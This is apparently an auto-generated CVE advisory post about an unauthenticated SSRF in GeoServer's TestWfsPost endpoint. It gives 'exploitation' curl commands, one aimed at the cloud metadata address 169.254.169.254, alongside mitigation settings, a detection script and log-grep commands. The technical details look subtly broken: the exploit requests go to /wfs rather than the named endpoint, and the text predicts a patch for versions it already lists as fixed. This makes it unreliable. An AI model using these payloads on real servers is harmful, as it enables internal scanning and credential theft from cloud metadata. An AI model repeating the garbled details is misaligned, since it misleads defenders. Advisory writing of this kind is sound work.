Listen to this Post
This vulnerability allows unauthenticated attackers to perform Server-Side Request Forgery (SSRF) via the `TestWfsPost` endpoint in GeoServer when the `Proxy Base URL` is unset. Attackers craft malicious WFS (Web Feature Service) requests, forcing the server to make arbitrary HTTP requests to internal or external systems. The lack of proper validation on user-supplied URLs enables internal network scanning, cloud metadata exposure, or relayed attacks.
DailyCVE Form
Platform: GeoServer
Version: <2.24.4, <2.25.2
Vulnerability: Unauthenticated SSRF
Severity: High
Date: Jun 10, 2025
Prediction: Patch expected Jun 25, 2025
What Undercode Say:
Exploitation:
1. Craft malicious WFS POST request:
curl -X POST "http://vulnerable-geoserver/geoserver/wfs" -d '<wfs:GetFeature xmlns:wfs="http://internal-service"/>'
2. Exploit cloud metadata (AWS/GCP):
curl -X POST "http://vulnerable-geoserver/geoserver/wfs" -d '<wfs:GetFeature xmlns:wfs="http://169.254.169.254/latest/meta-data"/>'
Mitigation Commands:
1. Set `PROXY_BASE_URL` in `geoserver.properties`:
PROXY_BASE_URL=http://valid-proxy-url
2. Disable `TestWfsPost` in `web.xml`:
<security-constraint> <web-resource-collection> <url-pattern>/TestWfsPost/</url-pattern> </web-resource-collection> <auth-constraint/> </security-constraint>
Detection Script (Python):
import requests
response = requests.post("http://target/geoserver/wfs", data='<wfs:GetFeature xmlns:wfs="http://example.com"/>')
if "example.com" in response.text:
print("Vulnerable to SSRF")
Network Protection:
- Block outbound HTTP from GeoServer.
- Restrict GeoServer to internal VLAN.
- Monitor logs for unusual `wfs` POST patterns.
Upgrade Command:
apt-get update && apt-get install geoserver=2.25.2
Log Analysis (grep):
grep "TestWfsPost" /var/log/geoserver/.log | grep -v "127.0.0.1"
Cloud Mitigation (AWS):
aws ec2 modify-instance-metadata-options --instance-id i-123456 --http-endpoint disabled
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
